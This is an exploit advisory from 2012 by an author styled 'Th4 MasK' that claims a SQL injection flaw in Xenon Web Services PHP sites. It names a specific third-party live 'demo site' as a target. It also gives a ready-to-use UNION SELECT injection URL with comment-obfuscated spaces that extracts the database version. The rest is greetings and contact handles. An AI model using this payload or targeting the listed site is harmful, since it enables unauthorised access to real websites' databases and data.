######################################################## ~ Exploit Title: * Xenon Web Services SQL Injection *~ ~ Author: Th4 MasK ~ Contact to ; th4_mask@windowslive.com ~ ~ Vendor: http://xe.co.za/ ~ Date : 14.02.2012 ~ ~ Platform : Php ~ ######################################################## ~ Demo Site : ~ www.kawasakisa.co.za/news_details.php?news_id=385 [SQL] Exploit : http://localhost/pview.php?id=(id)/**/AND/**/1=0/**/UNION/**/ALL/**/SELECT/**/1,/**/2,/**/3,/**/4,/**/@@version,/**/6,/**/7,/**/8,/**/9,/**/10,/**/11,/**/12,/**/13,/**/14,/**/15,/**/16,/**/17,/**/18,/**/19,/**/20,/**/21,/**/22-- ######################################################## ~* Bilinmezlik DiyarinDan ######################################################## ~* Olmassa Olmazimdir. Bazi seyler. ######################################################## ~* Email:th4_mask@windowslive.com~ ~ Greetz: http://th4mask.blogspot.com ~ DarkdevilZ.in ######################################################## ~ Mugair,Nikolay,Darkness Devil,Tekfurdagli,Evillord ########################################################